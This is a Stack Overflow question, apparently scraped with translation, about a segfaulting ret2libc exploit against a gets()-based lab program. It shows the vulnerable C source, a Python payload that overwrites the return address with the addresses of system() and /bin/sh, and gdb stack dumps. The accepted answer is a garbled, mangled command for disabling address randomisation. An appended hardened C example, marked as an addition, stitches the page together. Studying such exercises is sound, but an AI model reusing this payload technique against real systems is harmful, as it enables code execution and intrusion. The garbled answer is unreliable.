Segmentation fault in ret2libc attack

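Stack Overflow user
Asked on 2018-06-13 15:38:10
Answers 1, Views 624, Followers 0, Votes 0

I am trying to perform a ret2libc attack. To do this, I need to call system() from libc and pass the argument "/bin/sh" (the address of /bin/sh). Unfortunately, I get a "Segmentation fault" every time.

Can anyone tell me why? When I look at the stack, everything looks fine (to me).

Here is my source code:
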
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();
}

My exploit code is as follows:

    import struct
    offset = "A"*88
    system_adress = struct.pack("q",0x7ffff7a60510)
    nop = "\x90"*4
    bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)

    #libc_start = 0x7ffff7a1e000
    #sh_offset = 0x17d3f3
    #libc_start plus sh_Offset = 0x7ffff7b9b3f3

    print(offset + system_adress + nop + bin_sh_adress)

The following are my terminal commands:

>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text

Breakpoint 2, getpath () at stack6.c:11
11    printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000  0x00000000  0x00f0b2ff  0x00000000
0x7fffffffe170: 0x000000c2  0x00000000  0xffffe1a6  0x00007fff
0x7fffffffe180: 0x00000001  0x00000000  0xf7abe905  0x00007fff
0x7fffffffe190: 0x00000001  0x00000000  0x5555485d  0x00005555
0x7fffffffe1a0: 0xf7de70e0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1b0: 0xffffe1d0  0x00007fff  0x555547fd  0x00005555
0x7fffffffe1c0: 0xffffe2b8  0x00007fff  0x00000000  0x00000001
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
input path please: 13     gets(buffer);
>>> n

Breakpoint 1, getpath () at stack6.c:15
15    ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe170: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe180: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe190: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1a0: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1b0: 0x41414141  0x41414141  0xf7a60510  0x00007fff
0x7fffffffe1c0: 0x90909090  0xf7b9b3f3  0x00007fff  0x00000000
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
17    if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22    printf("got path %s\n", buffer);
>>> 

Error report:

root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault

1 Answer

Stack Overflow user

Accepted answer

Posted on 2018-06-28 20:16:41

Closed.

Problem solved:

-> disable 0>/proc/sys//->_va_space

Votes 0
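
The overflow in the question starts at `gets(buffer)`, which writes past the 64-byte buffer and over the saved return address. As an added example (not part of the original post or answer), here is a bounded replacement for that read; `read_path` and `PATH_BUF` are hypothetical names, and overlong input is rejected rather than truncated.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 64   /* same size as buffer[] in the question */

/* Hypothetical hardened replacement for the gets() call in getpath().
 * Reads one line from `in` into `out` (capacity `cap`).
 * Returns 0 on success, -1 on EOF/error with no data,
 * -2 if the line does not fit (the rest of the line is drained). */
int read_path(FILE *in, char *out, size_t cap)
{
    if (cap == 0 || fgets(out, (int)cap, in) == NULL)
        return -1;

    size_t len = strlen(out);
    if (len > 0 && out[len - 1] == '\n') {
        out[len - 1] = '\0';            /* complete line: strip the newline */
        return 0;
    }

    /* No newline stored: the line either fit exactly, ended at EOF,
     * or is longer than the buffer. Look at the next byte to decide. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 0;

    while (c != '\n' && c != EOF)       /* drain the oversized remainder */
        c = fgetc(in);
    out[0] = '\0';                      /* never hand back a truncated path */
    return -2;
}

int main(void)
{
    char buffer[PATH_BUF];

    printf("input path please: "); fflush(stdout);
    switch (read_path(stdin, buffer, sizeof buffer)) {
    case 0:
        printf("got path %s\n", buffer);
        return 0;
    case -2:
        fprintf(stderr, "path too long (max %d bytes)\n", PATH_BUF - 1);
        return 1;
    default:
        fprintf(stderr, "no input\n");
        return 1;
    }
}
```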
Original page content provided by Stack Overflow. Translation support provided by the Tencent Cloud Xiaowei IT-domain engine.
Original link:

https://stackoverflow.com/questions/50841188
